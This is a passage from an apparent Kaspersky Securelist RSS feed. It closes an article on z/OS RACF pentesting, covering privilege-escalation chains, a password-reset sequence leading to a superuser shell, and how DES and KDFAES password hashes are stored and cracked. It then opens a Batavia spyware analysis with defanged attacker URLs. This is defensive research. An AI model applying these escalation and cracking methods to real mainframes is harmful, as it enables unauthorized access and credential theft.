  312. <div id="attachment_116882" style="width: 1534px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116882" class="size-full wp-image-116882" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8.png" alt="Scope of influence of a user with a group-SPECIAL field" width="1524" height="1209" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8.png 1524w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8-300x238.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8-1024x812.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8-768x609.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8-441x350.png 441w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8-740x587.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8-353x280.png 353w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8-800x635.png 800w" sizes="auto, (max-width: 1524px) 100vw, 1524px" /></a><p id="caption-attachment-116882" class="wp-caption-text">Scope of influence of a user with a group-SPECIAL field</p></div>
  313. <p>For instance, consider USER1 with GROUP1 specified in the group-SPECIAL field. If GROUP1 owns GROUP2, and GROUP2 subsequently owns USER5, then USER1 gains privileges over USER5. This is not just about data access; USER1 essentially becomes the owner of USER5. A unique aspect of z/OS is that this level of access allows USER1 to, for example, change USER5&#8217;s password, even if USER5 holds privileged attributes like SPECIAL, OPERATIONS, ROAUDIT, AUDITOR, or PROTECTED.</p>
  314. <p>Below is an SQL query, generated using the racfudit utility, that identifies all users and groups where the specified user possesses special attributes:</p>
  315. <pre class="urvanov-syntax-highlighter-plain-tag">select ProfileName, CGGRPNM, CGUACC, CGFLAG2 from USER_BASE WHERE (CGFLAG2 LIKE '%10000000%');</pre> </p>
  316. <p>Here is a query to find users whose owners (AUTHOR) are not the standard default administrators:</p>
  317. <pre class="urvanov-syntax-highlighter-plain-tag">select ProfileName,AUTHOR from USER_BASE WHERE (AUTHOR NOT LIKE '%IBMUSER%' AND AUTHOR NOT LIKE 'SYS1%');</pre> </p>
  318. <p>Let&#8217;s illustrate how user privileges can be escalated through these implicit profile relationships.</p>
  319. <div id="attachment_116883" style="width: 1166px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116883" class="size-full wp-image-116883" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9.png" alt="Privilege escalation via the group-SPECIAL field" width="1156" height="575" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9.png 1156w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9-300x149.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9-1024x509.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9-768x382.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9-704x350.png 704w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9-740x368.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9-563x280.png 563w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9-800x398.png 800w" sizes="auto, (max-width: 1156px) 100vw, 1156px" /></a><p id="caption-attachment-116883" class="wp-caption-text">Privilege escalation via the group-SPECIAL field</p></div>
  320. <p>In this scenario, the user TESTUSR has the group-SPECIAL field set to PASSADM. This group, PASSADM, owns the OPERATOR user. This means TESTUSR&#8217;s scope of influence expands to include PASSADM&#8217;s scope, thereby granting TESTUSR control over OPERATOR. Consequently, if TESTUSR&#8217;s credentials are compromised, the attacker gains access to the OPERATOR user. The OPERATOR user, in turn, has READ access to the IRR.PASSWORD.RESET resource, which allows them to assign a password to any user who does not possess privileged permissions.</p>
  321. <p>Having elevated privileges in z/OS UNIX is often sufficient for compromising the mainframe. These can be acquired through several methods:</p>
  322. <ul>
  323. <li>Grant the user READ access to the BPX.SUPERUSER resource of the FACILITY class.</li>
  324. <li>Grant the user READ access to UNIXPRIV.SUPERUSER.* resources of the UNIXPRIV class.</li>
  325. <li>Set the UID field to 0 in the OMVS segment of the user profile.</li>
  326. </ul>
  327. <p>For example, the DFSOPER user has READ access to the BPX.SUPERUSER resource, making them privileged in z/OS UNIX and, by extension, across the entire mainframe. However, DFSOPER does not have the explicit privileged fields SPECIAL, OPERATIONS, AUDITOR, ROAUDIT and PROTECTED set, meaning the OPERATOR user can change DFSOPER&#8217;s password. This allows us to define the following sequence of actions to achieve high privileges on the mainframe:</p>
  328. <ol>
  329. <li>Obtain and use TESTUSR&#8217;s credentials to log in.</li>
  330. <li>Change OPERATOR&#8217;s password and log in with those credentials.</li>
  331. <li>Change DFSOPER&#8217;s password and log in with those credentials.</li>
  332. <li>Access the z/OS UNIX Shell with elevated privileges.</li>
  333. </ol>
  334. <p>We uncovered another implicit RACF profile relationship that enables user privilege escalation.</p>
  335. <div id="attachment_116884" style="width: 1166px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116884" class="size-full wp-image-116884" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10.png" alt="Privilege escalation from a chain of misconfigurations" width="1156" height="575" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10.png 1156w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10-300x149.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10-1024x509.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10-768x382.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10-704x350.png 704w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10-740x368.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10-563x280.png 563w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10-800x398.png 800w" sizes="auto, (max-width: 1156px) 100vw, 1156px" /></a><p id="caption-attachment-116884" class="wp-caption-text">Privilege escalation from a chain of misconfigurations</p></div>
  336. <p>In another example, the TESTUSR user has READ access to the OPERSMS.SUBMIT resource of the SURROGAT class. This implies that TESTUSR can create a task under the identity of OPERSMS using the ImpersonateTo relationship. OPERSMS is a member of the HFSADMIN group, which has READ access to the TESTAUTH resource of the TSOAUTH class. This resource indicates whether the user can run an application or library as APF-authorized – this requires only READ access. Therefore, if <a href="#searching-for-inadequate-uacc-control-in-data-sets">APF access is misconfigured</a>, the OPERSMS user can escalate their current privileges to the highest possible level. This outlines a path from the low-privileged TESTUSR to obtaining maximum privileges on the mainframe.</p>
  337. <p>At this stage, the racfudit utility allows identifying these connections only manually through a series of SQLite database queries. However, we are planning to add support for another output format, including Neo4j DBMS integration, to automatically visualize the interconnected chains described above.</p>
  338. <h2 id="password-hashes-in-racf">Password hashes in RACF</h2>
  339. <p>To escalate privileges and gain mainframe access, we need the credentials of privileged users. We previously used our utility to <a href="#collecting-password-hashes">extract their password hashes</a>. Now, let&#8217;s dive into the password policy principles in z/OS and outline methods for recovering passwords from these collected hashes.</p>
  340. <p>The primary password authentication methods in z/OS, based on RACF, are PASSWORD and PASSPHRASE. PASSWORD is a password composed by default of ASCII characters: uppercase English letters, numbers, and special characters (@#$). Its length is limited to 8 characters. PASSPHRASE, or a password phrase, has a more complex policy, allowing 14 to 100 ASCII characters, including lowercase or uppercase English letters, numbers, and an extended set of special characters (@#$&amp;*{}[]()=,.;&#8217;+/). Hashes for both PASSWORD and PASSPHRASE are stored in the user profile within the BASE segment, in the PASSWORD and PHRASE fields, respectively. Two algorithms are used to derive their values: DES and KDFAES.</p>
  341. <p>It is worth noting that we use the terms &#8220;password hash&#8221; and &#8220;password phrase hash&#8221; for clarity. When using the DES and KDFAES algorithms, user credentials are stored in the RACF database as encrypted text, not as a hash sum in its classical sense. Nevertheless, we will continue to use &#8220;password hash&#8221; and &#8220;password phrase hash&#8221; as is customary in IBM documentation.</p>
  342. <p>Let&#8217;s discuss the operating principles and characteristics of the DES and KDFAES algorithms in more detail.</p>
  343. <h3 id="des">DES</h3>
  344. <p>When the DES algorithm is used, the computation of PASSWORD and PHRASE values stored in the RACF database involves classic DES encryption. Here, the plaintext data block is the username (<a href="https://en.wikipedia.org/wiki/Padding_(cryptography)" target="_blank" rel="noopener">padded</a> to 8 characters if shorter), and the key is the password (also padded to 8 characters if shorter).</p>
  345. <h4 id="password">PASSWORD</h4>
  346. <p>The username is encrypted with the password as the key via the DES algorithm, and the 8-byte result is placed in the user profile&#8217;s PASSWORD field.</p>
  347. <div id="attachment_116885" style="width: 1209px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116885" class="size-full wp-image-116885" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11.png" alt="DES encryption of a password" width="1199" height="524" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11.png 1199w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11-300x131.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11-1024x448.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11-768x336.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11-801x350.png 801w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11-740x323.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11-641x280.png 641w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11-800x350.png 800w" sizes="auto, (max-width: 1199px) 100vw, 1199px" /></a><p id="caption-attachment-116885" class="wp-caption-text">DES encryption of a password</p></div>
  348. <p>Keep in mind that both the username and password are encoded with <a href="https://www.ibm.com/docs/en/zos-basic-skills?topic=mainframe-ebcdic-character-set" target="_blank" rel="noopener">EBCDIC</a>. For instance, the username <code>USR1</code> would look like this in EBCDIC: <code>e4e2d9f140404040</code>. The byte <code>0x40</code> serves as padding for the plaintext to reach 8 bytes.</p>
  349. <p>This password can be recovered quite fast, given the small keyspace and low computational complexity of DES. For example, a brute-force attack powered by a cluster of NVIDIA 4090 GPUs takes less than five minutes.</p>
  350. <p>The hashcat tool includes a module (Hash-type 8500) for cracking RACF passwords with the DES algorithm.</p>
  351. <h4 id="passphrase">PASSPHRASE</h4>
  352. <p>PASSPHRASE encryption is a bit more complex, and a detailed description of its algorithm is not readily available. However, our research uncovered certain interesting characteristics.</p>
  353. <p>First, the final hash length in the PHRASE field matches the original password phrase length. Essentially, the encrypted data output from DES gets truncated to the input plaintext length without padding. This design can clearly lead to collisions and incorrect authentication under certain conditions. For instance, if the original password phrase is 17 bytes long, it will be encrypted in three blocks, with the last block padded with seven bytes. These padded bytes are then truncated after encryption. In this scenario, any password whose first 17 encrypted bytes match the encrypted PASSPHRASE would be considered valid.</p>
  354. <p>The second interesting feature is that the PHRASE field value is also computed using the DES algorithm, but it employs a proprietary block chaining mode. We will informally refer to this as IBM-custom mode.</p>
  355. <div id="attachment_116886" style="width: 1209px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116886" class="size-full wp-image-116886" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12.png" alt="DES encryption of a password phrase" width="1199" height="524" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12.png 1199w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12-300x131.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12-1024x448.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12-768x336.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12-801x350.png 801w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12-740x323.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12-641x280.png 641w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12-800x350.png 800w" sizes="auto, (max-width: 1199px) 100vw, 1199px" /></a><p id="caption-attachment-116886" class="wp-caption-text">DES encryption of a password phrase</p></div>
  356. <p>Given these limitations, we can use the hashcat module for RACF DES to recover the first 8 characters of a password phrase from the first block of encrypted data in the PHRASE field. In some practical scenarios, recovering the beginning of a password phrase allowed us to guess the remainder, especially when weak dictionary passwords were used. For example, if we recovered <code>Admin123</code> (8 characters) while cracking a 15-byte PASSPHRASE hash, then it is plausible the full password phrase was <code>Admin1234567890</code>.</p>
  357. <h3 id="kdfaes">KDFAES</h3>
  358. <p>Computing passwords and password phrases generated with the KDFAES algorithm is significantly more challenging than with DES. KDFAES is a proprietary IBM algorithm that leverages AES encryption. The encryption key is generated from the password using the PBKDF2 function with a specific number of hashing iterations.</p>
  359. <h4 id="password">PASSWORD</h4>
  360. <p>The diagram below outlines the multi-stage KDFAES PASSWORD encryption algorithm.</p>
  361. <div id="attachment_116887" style="width: 1517px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116887" class="size-full wp-image-116887" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13.png" alt="KDFAES encryption of a password" width="1507" height="1110" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13.png 1507w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13-300x221.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13-1024x754.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13-768x566.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13-475x350.png 475w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13-740x545.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13-380x280.png 380w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13-800x589.png 800w" sizes="auto, (max-width: 1507px) 100vw, 1507px" /></a><p id="caption-attachment-116887" class="wp-caption-text">KDFAES encryption of a password</p></div>
  362. <p>The first stage mirrors the DES-based PASSWORD computation algorithm. Here, the plaintext username is encrypted using the DES algorithm with the password as the key. The username is also encoded in EBCDIC and padded if it&#8217;s shorter than 8 bytes. The resulting 8-byte output serves as the key for the second stage: hashing. This stage employs a proprietary IBM algorithm built upon PBKDF2-SHA256-HMAC. A randomly generated 16-byte string (salt) is fed into this algorithm along with the 8-byte key from the first stage. This data is then iteratively hashed using PBKDF2-SHA256-HMAC. The number of iterations is determined by two parameters set in RACF: the memory factor and the repetition factor. The output of the second stage is a 32-byte hash, which is then used as the key for AES encryption of the username in the third stage.</p>
  363. <p>The final output is 16 bytes of encrypted data. The first 8 bytes are appended to the end of the PWDX field in the user profile BASE segment, while the other 8 bytes are placed in the PASSWORD field within the same segment.</p>
  364. <p>The PWDX field in the BASE segment has the following structure:</p>
  365. <table>
  366. <tbody>
  367. <tr>
  368. <td><strong>Offset</strong></td>
  369. <td><strong>Size</strong></td>
  370. <td><strong>Field</strong></td>
  371. <td><strong>Comment</strong></td>
  372. </tr>
  373. <tr>
  374. <td><strong>0–3</strong></td>
  375. <td>4 bytes</td>
  376. <td><a href="https://encyclopedia.kaspersky.com/glossary/magic-number/" target="_blank" rel="noopener">Magic number</a></td>
  377. <td>In the profiles we analyzed, we observed only the value E7D7E66D</td>
  378. </tr>
  379. <tr>
  380. <td><strong>4–7</strong></td>
  381. <td>4 bytes</td>
  382. <td>Hash type</td>
  383. <td>In the profiles we analyzed, we observed only two values: 00180000 for PASSWORD hashes and 00140000 for PASSPHRASE hashes</td>
  384. </tr>
  385. <tr>
  386. <td><strong>8–9</strong></td>
  387. <td>2 bytes</td>
  388. <td>Memory factor</td>
  389. <td>A value that determines the number of iterations in the hashing stage</td>
  390. </tr>
  391. <tr>
  392. <td><strong>10–11</strong></td>
  393. <td>2 bytes</td>
  394. <td>Repetition factor</td>
  395. <td>A value that determines the number of iterations in the hashing stage</td>
  396. </tr>
  397. <tr>
  398. <td><strong>12–15</strong></td>
  399. <td>4 bytes</td>
  400. <td>Unknown value</td>
  401. <td>In the profiles we analyzed, we observed only the value 00100010</td>
  402. </tr>
  403. <tr>
  404. <td><strong>16–31</strong></td>
  405. <td>16 bytes</td>
  406. <td>Salt</td>
  407. <td>A randomly generated 16-byte string used in the hashing stage</td>
  408. </tr>
  409. <tr>
  410. <td><strong>32–39</strong></td>
  411. <td>8 bytes</td>
  412. <td>The first half of the password hash</td>
  413. <td>The first 8 bytes of the final encrypted data</td>
  414. </tr>
  415. </tbody>
  416. </table>
  417. <p>You can use the <a href="https://github.com/openwall/john/blob/bleeding-jumbo/src/racf_kdfaes_fmt_plug.c" target="_blank" rel="noopener">dedicated module</a> in the John the Ripper utility for offline password cracking. While an <a href="https://github.com/hashcat/hashcat/pull/2777/commits/f4080424a39e537a4004ec2c9664301a4fc658c2" target="_blank" rel="noopener">IBM KDFAES module</a> for an older version of hashcat exists publicly, it was never integrated into the main branch. Therefore, we developed our own <a href="https://github.com/hashcat/hashcat/pull/3940" target="_blank" rel="noopener">RACF KDFAES module</a> compatible with the current hashcat version.</p>
  418. <p>The time required to crack an RACF KDFAES hash has <a href="https://www.detack.de/_docs/media/19_1_1641358905.pdf" target="_blank" rel="noopener">significantly increased</a> compared to RACF DES, largely due to the integration of PBKDF2. For instance, if the memory factor and repetition factor are set to 0x08 and 0x32 respectively, the hashing stage can reach 40,000 iterations. This can extend the password cracking time to several months or even years.</p>
  419. <h4 id="passphrase">PASSPHRASE</h4>
  420. <div id="attachment_116888" style="width: 1517px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116888" class="size-full wp-image-116888" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14.png" alt="KDFAES encryption of a password phrase" width="1507" height="1110" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14.png 1507w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14-300x221.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14-1024x754.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14-768x566.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14-475x350.png 475w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14-740x545.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14-380x280.png 380w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14-800x589.png 800w" sizes="auto, (max-width: 1507px) 100vw, 1507px" /></a><p id="caption-attachment-116888" class="wp-caption-text">KDFAES encryption of a password phrase</p></div>
  421. <p>Encrypting a password phrase hash with KDFAES shares many similarities with encrypting a password hash. According to <a href="https://www.detack.de/_docs/media/19_1_1641358905.pdf" target="_blank" rel="noopener">public sources</a>, the primary difference lies in the key used during the second stage. For passwords, data derived from DES-encrypting the username was used, while for a password phrase, its SHA256 hash is used. During our analysis, we could not determine the exact password phrase hashing process – specifically, whether padding is involved, if a secret key is used, and so on.</p>
  422. <p>Additionally, when using a password phrase, the PHRASE and PHRASEX fields instead of PASSWORD and PWDX, respectively, store the final hash, with the PHRASEX value having a similar structure.</p>
  423. <h2 id="conclusion">Conclusion</h2>
  424. <p>In this article, we have explored the internal workings of the RACF security package, developed an approach to extracting information, and presented our own tool developed for the purpose. We also outlined several potential misconfigurations that could lead to mainframe compromise and described methods for detecting them. Furthermore, we examined the algorithms used for storing user credentials (passwords and password phrases) and highlighted their strengths and weaknesses.</p>
  425. <p>We hope that the information presented in this article helps mainframe owners better understand and assess the potential risks associated with incorrect RACF security suite configurations and take appropriate mitigation steps. Transitioning to the KDFAES algorithm and password phrases, controlling UACC values, verifying access to APF libraries, regularly tracking user relationship chains, and other steps mentioned in the article can significantly enhance your infrastructure security posture with minimal effort.</p>
  426. <p>In conclusion, it is worth noting that only a small percentage of the RACF database structure has been thoroughly studied. Comprehensive research would involve uncovering additional relationships between database entities, further investigating privileges and their capabilities, and developing tools to exploit excessive privileges. The topic of password recovery is also not fully covered because the encryption algorithms have not been fully studied. IBM z/OS mainframe researchers have immense opportunities for analysis. As for us, we will continue to shed light on the obscure, unexplored aspects of these devices, to help prevent potential vulnerabilities in mainframe infrastructure and associated security incidents.</p>
  427. ]]></content:encoded>
  429. <wfw:commentRss>https://securelist.com/zos-mainframe-pentesting-resource-access-control-facility/116873/feed/</wfw:commentRss>
  430. <slash:comments>0</slash:comments>
  433. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091236/zos-racf-featured-image.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
  434. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091236/zos-racf-featured-image-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  435. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091236/zos-racf-featured-image-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  436. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091236/zos-racf-featured-image-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  437. </item>
  438. <item>
  439. <title>Batavia spyware steals data from Russian organizations</title>
  440. <link>https://securelist.com/batavia-spyware-steals-data-from-russian-organizations/116866/</link>
  441. <comments>https://securelist.com/batavia-spyware-steals-data-from-russian-organizations/116866/#respond</comments>
  443. <dc:creator><![CDATA[Kaspersky]]></dc:creator>
  444. <pubDate>Mon, 07 Jul 2025 10:00:26 +0000</pubDate>
  445. <category><![CDATA[Malware descriptions]]></category>
  446. <category><![CDATA[Malware Technologies]]></category>
  447. <category><![CDATA[Microsoft Windows]]></category>
  448. <category><![CDATA[Targeted attacks]]></category>
  449. <category><![CDATA[Malware Descriptions]]></category>
  450. <category><![CDATA[Spyware]]></category>
  451. <category><![CDATA[Spear phishing]]></category>
  452. <category><![CDATA[Malware]]></category>
  453. <category><![CDATA[PowerShell]]></category>
  454. <category><![CDATA[Data theft]]></category>
  455. <category><![CDATA[VBS]]></category>
  456. <category><![CDATA[Windows malware]]></category>
  457. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116866</guid>
  458.  
  459. <description><![CDATA[Kaspersky experts have discovered a new spyware called Batavia, which steals data from corporate devices.]]></description>
  460. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/07093411/batavia-featured-image-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
  461. <p>Since early March 2025, our systems have recorded an increase in detections of similar files with names like <code>договор-2025-5.vbe</code>, <code>приложение.vbe</code>, and <code>dogovor.vbe</code> (translation: contract, attachment) among employees at various Russian organizations. The targeted attack begins with bait emails containing malicious links, sent under the pretext of signing a contract. The campaign began in July 2024 and is still ongoing at the time of publication. The main goal of the attack is to infect organizations with the previously unknown Batavia spyware, which then proceeds to steal internal documents. The malware consists of the following malicious components: a VBA script and two executable files, which we will describe in this article. Kaspersky solutions detect these components as <code>HEUR:Trojan.VBS.Batavia.gen</code> and <code>HEUR:Trojan-Spy.Win32.Batavia.gen</code>.</p>
  462. <h2 id="first-stage-of-infection-vbs-script">First stage of infection: VBS script</h2>
  463. <p>As an example, we examined one of the emails users received in February. According to our research, the theme of these emails has remained largely unchanged since the start of the campaign.</p>
  464. <div id="attachment_116869" style="width: 1230px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116869" class="size-full wp-image-116869" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1.png" alt="Example of an email with a malicious link" width="1220" height="904" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1.png 1220w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1-300x222.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1-1024x759.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1-768x569.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1-472x350.png 472w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1-740x548.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1-378x280.png 378w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1-800x593.png 800w" sizes="auto, (max-width: 1220px) 100vw, 1220px" /></a><p id="caption-attachment-116869" class="wp-caption-text">Example of an email with a malicious link</p></div>
  465. <p>In this email, the employee is asked to download a contract file supposedly attached to the message. In reality, the attached file is actually a malicious link: <code>https://oblast-ru[.]com/oblast_download/?file=hc1-[redacted]</code>.</p>
  466. <p>Notably, the sender&#8217;s address belongs to the same domain – <code>oblast-ru[.]com</code>, which is owned by the attackers. We also observed that the <code>file=hc1-[redacted]</code> argument is unique for each email and is used in subsequent stages of the infection, which we&#8217;ll discuss in more detail below.</p>
  467. <p>When the link is clicked, an archive is downloaded to the user&#8217;s device, containing just one file: the script <code>Договор-2025-2.vbe</code>, encrypted using Microsoft&#8217;s proprietary algorithm (MD5: 2963FB4980127ADB7E045A0F743EAD05).</p>
  468. <div id="attachment_116870" style="width: 694px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04223000/batavia-spyware2.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116870" class="size-full wp-image-116870" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04223000/batavia-spyware2.png" alt="Snippet of the malicious script after decryption" width="684" height="332" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04223000/batavia-spyware2.png 684w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04223000/batavia-spyware2-300x146.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04223000/batavia-spyware2-577x280.png 577w" sizes="auto, (max-width: 684px) 100vw, 684px" /></a><p id="caption-attachment-116870" class="wp-caption-text">Snippet of the malicious script after decryption</p></div>
  469. <p>The script is a downloader that retrieves a specially crafted string of 12 comma-separated parameters from the hardcoded URL <code><strong>https://oblast-ru[.]com/oblast_download/?file=hc1-[redacted]</strong>&amp;vput2</code>. These parameters are arguments for various malicious functions. For example, the script identifies the OS version of the infected device and sends it to the attackers&#8217; C2 server.</p>
  470. <table>
  471. <tbody>
  472. <tr>
  473. <td>#</td>
